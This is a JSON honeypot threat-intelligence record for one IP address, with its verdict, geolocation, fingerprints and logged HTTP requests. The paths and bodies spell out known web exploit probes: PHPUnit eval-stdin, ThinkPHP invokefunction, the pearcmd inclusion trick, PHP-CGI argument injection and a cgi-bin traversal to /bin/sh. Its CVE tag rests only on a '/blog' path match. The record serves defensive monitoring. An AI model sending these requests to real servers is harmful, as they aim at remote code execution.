{"ip":"118.145.107.253","total_events":46,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"43 exploit-path hits","confidence":"high","network_type":"CDN"},"first_seen":"2026-05-28T19:23:59","last_seen":"2026-05-28T19:34:22","events_24h":0,"events_7d":0,"geo":{"country_code":"CN","country_name":"China","region":"","city":"","lat":34.7732,"lon":113.722,"asn":137718,"org":"Beijing Volcano Engine Technology Co., Ltd."},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as137718","label":"VOLCANO-ENGINE","category":"cdn","url":"https://www.peeringdb.com/asn/137718"},"cve_matches":[{"cve_id":"CVE-2021-41097","title":"Aurelia-Path < 1.1.7 - Prototype Pollution","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/blog"}],"top_ports":[{"port":80,"proto":"tcp","label":"HTTP","count":46}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge11nn0500_36cc78c039d7","po11nn0700_c5a94e7539c9","ge11nn0700_c5a94e7539c9"]},"fingerprint_peers":{"ge11nn0500_36cc78c039d7":412,"po11nn0700_c5a94e7539c9":314,"ge11nn0700_c5a94e7539c9":305},"user_agents":["libredtail-http"],"timeline":[{"date":"2026-05-28","count":46}],"recent_events":[{"timestamp":"2026-05-28T19:34:22","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"connection\":\"keep-alive\",\"host\":\"<HONEYPOT>:80\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"libredtail-http\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/containers/json","summary":"","payload_hex":"474554202f636f6e7461696e6572732f6a736f6e20485454502f312e310d0a486f73743a20<HONEYPOT>3a38300d0a557067726164652d496e7365637572652d52657175657374733a20310d0a4163636570743a202a2f2a0d0a557365722d4167656e743a206c69627265647461696c2d687474700d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a0d0a","method":"GET","user_agent":"libredtail-http","community_id":"1:jCKSTsHz9TCSgiV8nHh1JbkJIZ8=","ja3":"","session":"9a2f02ec-86a7-4678-aa91-b997caf524ae","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0},{"timestamp":"2026-05-28T19:34:08","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"connection\":\"keep-alive\",\"host\":\"<HONEYPOT>:80\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"libredtail-http\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/index.php?lang=../../../../../../../../tmp/index1","summary":"","payload_hex":"474554202f696e6465782e7068703f6c616e673d2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f746d702f696e6465783120485454502f312e310d0a486f73743a20<HONEYPOT>3a38300d0a557067726164652d496e7365637572652d52657175657374733a20310d0a4163636570743a202a2f2a0d0a557365722d4167656e743a206c69627265647461696c2d687474700d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a0d0a","method":"GET","user_agent":"libredtail-http","community_id":"1:jCKSTsHz9TCSgiV8nHh1JbkJIZ8=","ja3":"","session":"9a2f02ec-86a7-4678-aa91-b997caf524ae","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0},{"timestamp":"2026-05-28T19:33:54","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"connection\":\"keep-alive\",\"host\":\"<HONEYPOT>:80\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"libredtail-http\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php","summary":"","payload_hex":"474554202f696e6465782e7068703f6c616e673d2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7573722f6c6f63616c2f6c69622f7068702f70656172636d64262b636f6e6669672d6372656174652b2f262f3c3f6563686f286d6435282268692229293b3f3e2b2f746d702f696e646578312e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a38300d0a557067726164652d496e7365637572652d52657175657374733a20310d0a4163636570743a202a2f2a0d0a557365722d4167656e743a206c69627265647461696c2d687474700d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a0d0a","method":"GET","user_agent":"libredtail-http","community_id":"1:jCKSTsHz9TCSgiV8nHh1JbkJIZ8=","ja3":"","session":"9a2f02ec-86a7-4678-aa91-b997caf524ae","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0},{"timestamp":"2026-05-28T19:33:40","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"connection\":\"keep-alive\",\"host\":\"<HONEYPOT>:80\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"libredtail-http\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello","summary":"","payload_hex":"474554202f7075626c69632f696e6465782e7068703f733d2f696e6465782f5c7468696e6b5c6170702f696e766f6b6566756e6374696f6e2666756e6374696f6e3d63616c6c5f757365725f66756e635f617272617926766172735b305d3d6d643526766172735b315d5b5d3d48656c6c6f20485454502f312e310d0a486f73743a20<HONEYPOT>3a38300d0a557067726164652d496e7365637572652d52657175657374733a20310d0a4163636570743a202a2f2a0d0a557365722d4167656e743a206c69627265647461696c2d687474700d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a0d0a","method":"GET","user_agent":"libredtail-http","community_id":"1:jCKSTsHz9TCSgiV8nHh1JbkJIZ8=","ja3":"","session":"9a2f02ec-86a7-4678-aa91-b997caf524ae","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0},{"timestamp":"2026-05-28T19:33:26","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"connection\":\"keep-alive\",\"host\":\"<HONEYPOT>:80\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"libredtail-http\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello","summary":"","payload_hex":"474554202f696e6465782e7068703f733d2f696e6465782f5c7468696e6b5c6170702f696e766f6b6566756e6374696f6e2666756e6374696f6e3d63616c6c5f757365725f66756e635f617272617926766172735b305d3d6d643526766172735b315d5b5d3d48656c6c6f20485454502f312e310d0a486f73743a20<HONEYPOT>3a38300d0a557067726164652d496e7365637572652d52657175657374733a20310d0a4163636570743a202a2f2a0d0a557365722d4167656e743a206c69627265647461696c2d687474700d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a0d0a","method":"GET","user_agent":"libredtail-http","community_id":"1:jCKSTsHz9TCSgiV8nHh1JbkJIZ8=","ja3":"","session":"9a2f02ec-86a7-4678-aa91-b997caf524ae","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0},{"timestamp":"2026-05-28T19:33:11","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"connection\":\"keep-alive\",\"content-length\":\"33\",\"content-type\":\"text/plain\",\"host\":\"<HONEYPOT>:80\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"libredtail-http\"}","body":"<?php echo(md5(\"Hello PHPUnit\"));","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","summary":"","payload_hex":"474554202f6170702f76656e646f722f706870756e69742f706870756e69742f7372632f5574696c2f5048502f6576616c2d737464696e2e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a38300d0a557067726164652d496e7365637572652d52657175657374733a20310d0a4163636570743a202a2f2a0d0a557365722d4167656e743a206c69627265647461696c2d687474700d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a436f6e74656e742d4c656e6774683a2033330d0a0d0a3c3f706870206563686f286d6435282248656c6c6f20504850556e69742229293b","method":"GET","user_agent":"libredtail-http","community_id":"1:jCKSTsHz9TCSgiV8nHh1JbkJIZ8=","ja3":"","session":"9a2f02ec-86a7-4678-aa91-b997caf524ae","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0},{"timestamp":"2026-05-28T19:32:55","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"connection\":\"keep-alive\",\"content-length\":\"33\",\"content-type\":\"text/plain\",\"host\":\"<HONEYPOT>:80\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"libredtail-http\"}","body":"<?php echo(md5(\"Hello PHPUnit\"));","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","summary":"","payload_hex":"474554202f617070732f76656e646f722f706870756e69742f706870756e69742f7372632f5574696c2f5048502f6576616c2d737464696e2e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a38300d0a557067726164652d496e7365637572652d52657175657374733a20310d0a4163636570743a202a2f2a0d0a557365722d4167656e743a206c69627265647461696c2d687474700d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a436f6e74656e742d4c656e6774683a2033330d0a0d0a3c3f706870206563686f286d6435282248656c6c6f20504850556e69742229293b","method":"GET","user_agent":"libredtail-http","community_id":"1:jCKSTsHz9TCSgiV8nHh1JbkJIZ8=","ja3":"","session":"9a2f02ec-86a7-4678-aa91-b997caf524ae","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0},{"timestamp":"2026-05-28T19:32:41","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"connection\":\"keep-alive\",\"content-length\":\"33\",\"content-type\":\"text/plain\",\"host\":\"<HONEYPOT>:80\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"libredtail-http\"}","body":"<?php echo(md5(\"Hello PHPUnit\"));","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","summary":"","payload_hex":"474554202f7075626c69632f76656e646f722f706870756e69742f706870756e69742f7372632f5574696c2f5048502f6576616c2d737464696e2e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a38300d0a557067726164652d496e7365637572652d52657175657374733a20310d0a4163636570743a202a2f2a0d0a557365722d4167656e743a206c69627265647461696c2d687474700d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a436f6e74656e742d4c656e6774683a2033330d0a0d0a3c3f706870206563686f286d6435282248656c6c6f20504850556e69742229293b","method":"GET","user_agent":"libredtail-http","community_id":"1:jCKSTsHz9TCSgiV8nHh1JbkJIZ8=","ja3":"","session":"9a2f02ec-86a7-4678-aa91-b997caf524ae","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0},{"timestamp":"2026-05-28T19:32:26","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"connection\":\"keep-alive\",\"content-length\":\"33\",\"content-type\":\"text/plain\",\"host\":\"<HONEYPOT>:80\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"libredtail-http\"}","body":"<?php echo(md5(\"Hello PHPUnit\"));","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","summary":"","payload_hex":"474554202f70616e656c2f76656e646f722f706870756e69742f706870756e69742f7372632f5574696c2f5048502f6576616c2d737464696e2e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a38300d0a557067726164652d496e7365637572652d52657175657374733a20310d0a4163636570743a202a2f2a0d0a557365722d4167656e743a206c69627265647461696c2d687474700d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a436f6e74656e742d4c656e6774683a2033330d0a0d0a3c3f706870206563686f286d6435282248656c6c6f20504850556e69742229293b","method":"GET","user_agent":"libredtail-http","community_id":"1:jCKSTsHz9TCSgiV8nHh1JbkJIZ8=","ja3":"","session":"9a2f02ec-86a7-4678-aa91-b997caf524ae","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0},{"timestamp":"2026-05-28T19:32:12","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"connection\":\"keep-alive\",\"content-length\":\"33\",\"content-type\":\"text/plain\",\"host\":\"<HONEYPOT>:80\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"libredtail-http\"}","body":"<?php echo(md5(\"Hello PHPUnit\"));","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","summary":"","payload_hex":"474554202f776f726b73706163652f64727570616c2f76656e646f722f706870756e69742f706870756e69742f7372632f5574696c2f5048502f6576616c2d737464696e2e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a38300d0a557067726164652d496e7365637572652d52657175657374733a20310d0a4163636570743a202a2f2a0d0a557365722d4167656e743a206c69627265647461696c2d687474700d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a436f6e74656e742d4c656e6774683a2033330d0a0d0a3c3f706870206563686f286d6435282248656c6c6f20504850556e69742229293b","method":"GET","user_agent":"libredtail-http","community_id":"1:jCKSTsHz9TCSgiV8nHh1JbkJIZ8=","ja3":"","session":"9a2f02ec-86a7-4678-aa91-b997caf524ae","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0}],"http_methods":[{"method":"GET","count":42},{"method":"POST","count":4}],"distinct_ports_total":1,"top_paths":[{"path":"/containers/json","count":1,"ports":1},{"path":"/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","count":1,"ports":1},{"path":"/lib/phpunit/Util/PHP/eval-stdin.php","count":1,"ports":1},{"path":"/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","count":1,"ports":1},{"path":"/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello","count":1,"ports":1},{"path":"/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","count":1,"ports":1},{"path":"/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","count":1,"ports":1},{"path":"/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","count":1,"ports":1},{"path":"/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","count":1,"ports":1},{"path":"/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","count":1,"ports":1},{"path":"/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php","count":1,"ports":1},{"path":"/lib/phpunit/phpunit/Util/PHP/eval-stdin.php","count":1,"ports":1},{"path":"/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh","count":1,"ports":1},{"path":"/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","count":1,"ports":1},{"path":"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","count":1,"ports":1}],"distinct_paths_total":46,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Connection","Content-Length","Content-Type","Host","Upgrade-Insecure-Requests","User-Agent"],"representative":[{"name":"Accept","value":"*/*","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"33","notable":false},{"name":"Content-Type","value":"text/plain","notable":true},{"name":"Host","value":"<HONEYPOT>:80","notable":false},{"name":"Upgrade-Insecure-Requests","value":"1","notable":false},{"name":"User-Agent","value":"libredtail-http","notable":false}],"distinct_sets":2,"events_with_headers":10},"tags":[{"tag_id":"CVE-2021-41097","tag_type":"cve","title":"Aurelia-Path < 1.1.7 - Prototype Pollution","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/blog","reference_urls":["https://github.com/aurelia/path/issues/44","https://security.snyk.io/vuln/SNYK-JS-AURELIAPATH-1579475","https://nvd.nist.gov/vuln/detail/CVE-2021-41097"]}],"data_as_of":"2026-06-15T12:26:27.116647+00:00"}